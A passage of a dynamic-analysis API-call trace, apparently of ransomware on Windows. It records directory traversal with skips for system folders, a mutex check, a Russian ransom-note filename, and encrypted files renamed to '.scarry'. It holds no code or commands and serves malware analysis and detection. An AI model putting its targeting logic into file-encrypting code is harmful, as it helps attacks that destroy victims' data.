lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@鰄W企@\x18㪔X\x18\x8f")) returned 0xffffffff [0109.077] GetLastError () returned 0x2 [0109.077] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=6, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="reserv㩀X ") returned 6 [0109.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=7, lpWideCharStr=0x18da8c, cchWideChar=2047 | out: lpWideCharStr="Restoreft SQL Server Compact Edition\\") returned 7 [0109.078] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\Restore", lpFindFileData=0x18e840 | out: lpFindFileData=0x18e840*(dwFileAttributes=0xfa83bc83, ftCreationTime.dwLowDateTime=0x5959a8, ftCreationTime.dwHighDateTime=0x553a80, ftLastAccessTime.dwLowDateTime=0x421c168f, ftLastAccessTime.dwHighDateTime=0x550000, ftLastWriteTime.dwLowDateTime=0x6f747365, ftLastWriteTime.dwHighDateTime=0x3b6572, nFileSizeHigh=0x0, nFileSizeLow=0x553a80, dwReserved0=0x2000002, dwReserved1=0xd646935e, cFileName="⃈Ђ", cAlternateFileName="V䱠@퉬X企@\x18㩄X\x18\x97")) returned 0xffffffff [0109.078] GetLastError () returned 0x2 [0109.078] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.078] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=7, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="restoreX ") returned 7 [0109.078] GlobalLock (hMem=0x450004) returned 0x591988 [0109.078] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.078] GlobalUnlock (hMem=0x450004) returned 0 [0109.078] GlobalLock (hMem=0x450004) returned 0x591988 [0109.078] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.079] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.079] GlobalUnlock (hMem=0x450004) returned 0 [0109.079] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.079] GlobalUnlock (hMem=0x45000c) returned 0 [0109.079] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.079] GetEnvironmentVariableA (in: lpName="ALLUSERSPROFILE", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.079] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab08, cbMultiByte=15, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\") returned 15 [0109.079] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.079] GetEnvironmentVariableA (in: lpName="APPDATA", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming") returned 0x2d [0109.079] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e79fe8, cbMultiByte=46, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 46 [0109.079] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.079] GetEnvironmentVariableA (in: lpName="ProgramData", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\ProgramData") returned 0xe [0109.079] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\programdata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0109.080] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.080] GetEnvironmentVariableA (in: lpName="WINDIR", lpBuffer=0x18e63c, nSize=0x400 | out: lpBuffer="C:\\Windows") returned 0xa [0109.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea94b0, cbMultiByte=11, lpWideCharStr=0x18da3c, cchWideChar=2047 | out: lpWideCharStr="c:\\windows\\ata\\jn0js halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0109.080] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.080] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.080] GlobalUnlock (hMem=0x45000c) returned 0 [0109.080] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.080] GlobalLock (hMem=0x450004) returned 0x593998 [0109.080] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.080] GlobalUnlock (hMem=0x45000c) returned 0 [0109.080] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.080] GlobalUnlock (hMem=0x450004) returned 0 [0109.080] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.080] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=15, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\$recycle.bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 15 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=11, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="\\all users\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 11 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=9, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="\\appdata\\s\\bin\\s halpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e9ab28, cbMultiByte=18, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr="\\application data\\alpmcxz\\appdata\\roaming\\eft SQL Server Compact Edition\\") returned 18 [0109.083] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.083] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1d997e8, cbMultiByte=28, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\system volume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 28 [0109.084] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=10, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\windows\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 10 [0109.084] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=8, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\intel\\s\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 8 [0109.084] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1ea9a68, cbMultiByte=9, lpWideCharStr=0x18da44, cchWideChar=2047 | out: lpWideCharStr=":\\nvidia\\\\olume information\\pdata\\roaming\\eft SQL Server Compact Edition\\") returned 9 [0109.084] CharLowerBuffW (in: lpsz="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\", cchLength=0x3d | out: lpsz="c:\\program files\\common files\\microsoft shared\\equation\\1033\\") returned 0x3d [0109.084] SHGetMalloc (in: ppMalloc=0x18ea8c | out: ppMalloc=0x18ea8c*=0x767666bc) returned 0x0 [0109.085] SHGetSpecialFolderLocation (in: hwnd=0x0, csidl=0, ppidl=0x18ea88 | out: ppidl=0x18ea88) returned 0x0 [0109.085] SHGetPathFromIDListW (in: pidl=0x578208, pszPath=0x57c6b4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.086] SysReAllocStringLen (in: pbstr=0x18eb10*=0x0, psz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", len=0x25 | out: pbstr=0x18eb10*="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0109.086] IMalloc:Free (This=0x767666bc, pv=0x578208) [0109.086] IUnknown:AddRef (This=0x767666bc) returned 0x1 [0109.086] CharLowerBuffW (in: lpsz="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", cchLength=0x25 | out: lpsz="c:\\users\\5p5nrgjn0js halpmcxz\\desktop") returned 0x25 [0109.086] GlobalLock (hMem=0x450004) returned 0x591988 [0109.086] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.086] GlobalUnlock (hMem=0x450004) returned 0 [0109.087] GlobalLock (hMem=0x450004) returned 0x591988 [0109.087] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.087] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.087] GlobalUnlock (hMem=0x450004) returned 0 [0109.087] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.087] GlobalUnlock (hMem=0x45000c) returned 0 [0109.087] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*", lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b060 [0109.087] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.087] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0109.087] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea88 | out: lpLocalFileTime=0x18ea88) returned 1 [0109.087] FileTimeToDosDateTime (in: lpFileTime=0x18ea88, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.087] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.087] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.087] GlobalUnlock (hMem=0x45000c) returned 0 [0109.087] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.087] GlobalLock (hMem=0x450004) returned 0x5949a0 [0109.087] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.087] GlobalUnlock (hMem=0x45000c) returned 0 [0109.088] GlobalHandle (pMem=0x5949a0) returned 0x450004 [0109.088] GlobalUnlock (hMem=0x450004) returned 0 [0109.088] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.088] CharLowerBuffW (in: lpsz="EEINTL.DLL", cchLength=0xa | out: lpsz="eeintl.dll") returned 0xa [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".ê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="l", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="tê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="n", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="nê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="i", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="iê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="e", cchWideChar=1, lpMultiByteStr=0x18da1c, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="eê\x18", lpUsedDefaultChar=0x0) returned 1 [0109.088] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x1e6ac78, cbMultiByte=36, lpWideCharStr=0x18da24, cchWideChar=2047 | out: lpWideCharStr="Èíñòðóêöèÿ ïî ðàñøèôðîâêå ôàéëîâ.txt\x06") returned 36 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", cchWideChar=71, lpMultiByteStr=0x18da00, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpUsedDefaultChar=0x0) returned 71 [0109.088] CharLowerBuffW (in: lpsz=".DLL", cchLength=0x4 | out: lpsz=".dll") returned 0x4 [0109.088] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=".dll", cchWideChar=4, lpMultiByteStr=0x18da24, cbMultiByte=4095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=".dllShared\\EQUATION\\1033\\EEINTL.DLL", lpUsedDefaultChar=0x0) returned 4 [0109.089] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0109.089] GetLastError () returned 0x12 [0109.089] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0109.089] GlobalLock (hMem=0x450004) returned 0x591988 [0109.089] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.089] GlobalUnlock (hMem=0x450004) returned 0 [0109.089] GlobalLock (hMem=0x450004) returned 0x591988 [0109.089] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.089] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.089] GlobalUnlock (hMem=0x450004) returned 0 [0109.089] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.089] GlobalUnlock (hMem=0x45000c) returned 0 [0109.089] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\*.*", lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x58b060 [0109.089] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea88 | out: lpLocalFileTime=0x18ea88) returned 1 [0109.089] FileTimeToDosDateTime (in: lpFileTime=0x18ea88, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.090] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.090] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.090] GlobalUnlock (hMem=0x45000c) returned 0 [0109.090] GlobalLock (hMem=0x45000c) returned 0x591988 [0109.090] GlobalLock (hMem=0x450004) returned 0x593998 [0109.090] GlobalHandle (pMem=0x591988) returned 0x45000c [0109.090] GlobalUnlock (hMem=0x45000c) returned 0 [0109.090] GlobalHandle (pMem=0x593998) returned 0x450004 [0109.090] GlobalUnlock (hMem=0x450004) returned 0 [0109.090] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.090] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xeed38550, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xeed38550, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0109.090] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea84 | out: lpLocalFileTime=0x18ea84) returned 1 [0109.090] FileTimeToDosDateTime (in: lpFileTime=0x18ea84, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.090] GlobalLock (hMem=0x450004) returned 0x592990 [0109.090] GlobalHandle (pMem=0x592990) returned 0x450004 [0109.090] GlobalUnlock (hMem=0x450004) returned 0 [0109.090] GlobalLock (hMem=0x450004) returned 0x592990 [0109.090] GlobalLock (hMem=0x45000c) returned 0x5949a0 [0109.090] GlobalHandle (pMem=0x592990) returned 0x450004 [0109.090] GlobalUnlock (hMem=0x450004) returned 0 [0109.090] GlobalHandle (pMem=0x5949a0) returned 0x45000c [0109.090] GlobalUnlock (hMem=0x45000c) returned 0 [0109.090] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.090] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 1 [0109.091] FileTimeToLocalFileTime (in: lpFileTime=0x18eb78, lpLocalFileTime=0x18ea84 | out: lpLocalFileTime=0x18ea84) returned 1 [0109.091] FileTimeToDosDateTime (in: lpFileTime=0x18ea84, lpFatDate=0x18eb46, lpFatTime=0x18eb44 | out: lpFatDate=0x18eb46, lpFatTime=0x18eb44) returned 1 [0109.091] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.091] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.091] GlobalUnlock (hMem=0x45000c) returned 0 [0109.091] GlobalLock (hMem=0x45000c) returned 0x592990 [0109.091] GlobalLock (hMem=0x450004) returned 0x5949a0 [0109.091] GlobalHandle (pMem=0x592990) returned 0x45000c [0109.091] GlobalUnlock (hMem=0x45000c) returned 0 [0109.091] GlobalHandle (pMem=0x5949a0) returned 0x450004 [0109.091] GlobalUnlock (hMem=0x450004) returned 0 [0109.091] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.091] FindNextFileW (in: hFindFile=0x58b060, lpFindFileData=0x18eb64 | out: lpFindFileData=0x18eb64*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0109.091] GetLastError () returned 0x12 [0109.091] FindClose (in: hFindFile=0x58b060 | out: hFindFile=0x58b060) returned 1 [0109.091] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x95fd7600, ftCreationTime.dwHighDateTime=0x1bc9dc7, ftLastAccessTime.dwLowDateTime=0xeef015d0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x95fd7600, ftLastWriteTime.dwHighDateTime=0x1bc9dc7, nFileSizeHigh=0x0, nFileSizeLow=0x1e9d, dwReserved0=0x0, dwReserved1=0x0, cFileName="AzQX0q5p4V3C2CA2Q4gBgngW2woDnQ.scarry", cAlternateFileName="AZQX0Q~1.SCA")) returned 1 [0109.092] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: lpLocalFileTime=0x18edc4) returned 1 [0109.092] FileTimeToDosDateTime (in: lpFileTime=0x18edc4, lpFatDate=0x18ee86, lpFatTime=0x18ee84 | out: lpFatDate=0x18ee86, lpFatTime=0x18ee84) returned 1 [0109.092] GlobalLock (hMem=0x450004) returned 0x591988 [0109.092] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.092] GlobalUnlock (hMem=0x450004) returned 0 [0109.092] GlobalLock (hMem=0x450004) returned 0x591988 [0109.092] GlobalLock (hMem=0x45000c) returned 0x593998 [0109.092] GlobalHandle (pMem=0x591988) returned 0x450004 [0109.092] GlobalUnlock (hMem=0x450004) returned 0 [0109.092] GlobalHandle (pMem=0x593998) returned 0x45000c [0109.092] GlobalUnlock (hMem=0x45000c) returned 0 [0109.092] OpenMutexA (dwDesiredAccess=0x1f0001, bInheritHandle=0, lpName="{46E4D4E6-8B81-84CA-93DA-BB29377B2AC0}") returned 0x0 [0109.092] FindNextFileW (in: hFindFile=0x58b020, lpFindFileData=0x18eea4 | out: lpFindFileData=0x18eea4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3acd3b00, ftCreationTime.dwHighDateTime=0x1c6cca0, ftLastAccessTime.dwLowDateTime=0xeed5e6b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x3acd3b00, ftLastWriteTime.dwHighDateTime=0x1c6cca0, nFileSizeHigh=0x0, nFileSizeLow=0x2ed, dwReserved0=0x0, dwReserved1=0x0, cFileName="Cr5RDwmwHs8MynVqdU5DcZE45mqoEc8m6vr8ArB=GSpuRTe9BYpCgPmO.scarry", cAlternateFileName="CR5RDW~1.SCA")) returned 1 [0109.092] FileTimeToLocalFileTime (in: lpFileTime=0x18eeb8, lpLocalFileTime=0x18edc4 | out: 